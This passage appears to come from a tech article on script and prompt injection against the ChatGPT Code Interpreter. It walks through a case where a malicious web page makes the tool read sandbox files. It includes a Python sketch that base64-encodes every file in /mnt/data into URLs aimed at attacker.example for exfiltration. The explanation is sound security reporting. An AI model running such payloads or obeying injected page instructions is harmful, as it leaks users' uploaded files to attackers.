So far, so good. However, the ability to execute code also brings security risks, such as code injection and unpatched bugs. The ChatGPT Code Interpreter is no different.
Its ability to execute Python code and access third-party websites has made it vulnerable to script injection attacks, which allow attackers to execute malicious scripts hosted on another website.
These scripts can instruct the plugin to perform actions on the server; for instance, they can ask it to extract the contents of files within a specific folder. Tom's Hardware explored this vulnerability in detail, showing how the ChatGPT Code Interpreter can be tricked into running malicious scripts from a third-party server (a rough sketch of such a payload appears below). When I asked the Code Interpreter directly whether its AI is vulnerable to code injection attacks, this is what it said:
What ChatGPT Code Interpreter Says About Its Code Injection Vulnerabilities
Obviously, no one admits their own flaws, not even AI.
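To make the attack concrete, here is a minimal, purely illustrative sketch of the kind of Python an injected page might instruct the Code Interpreter to run inside its sandbox. The attacker server is a hypothetical placeholder, and /mnt/data is the directory where the Code Interpreter typically stores uploaded files:

```python
# Illustrative only: the kind of payload an injected prompt might ask
# the Code Interpreter to execute in its sandbox.
import base64
from pathlib import Path
from urllib.parse import quote

SANDBOX_DIR = Path("/mnt/data")  # where Code Interpreter keeps uploaded files
EXFIL_URL = "https://attacker.example/collect"  # hypothetical attacker-controlled server

for f in SANDBOX_DIR.glob("*"):
    if f.is_file():
        # Encode the file contents so they survive transport in a URL
        payload = base64.urlsafe_b64encode(f.read_bytes()).decode()
        # The injected instructions would tell the model to "visit" this URL,
        # leaking the data through an ordinary-looking web request
        print(f"{EXFIL_URL}?name={quote(f.name)}&data={payload}")
```

This sketch only prints the exfiltration URLs; in a real attack, the injected instructions would direct the model to browse to them, smuggling the file contents out through what looks like an ordinary web request.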
This vulnerability was first reported in November 2023. However, OpenAI has not yet confirmed that it has been fixed.
That said, these attacks are not trivial to execute: they require the user to submit a prompt asking the Code Interpreter to access a malicious website. While people can be tricked into sending such prompts through social engineering, the odds are quite low.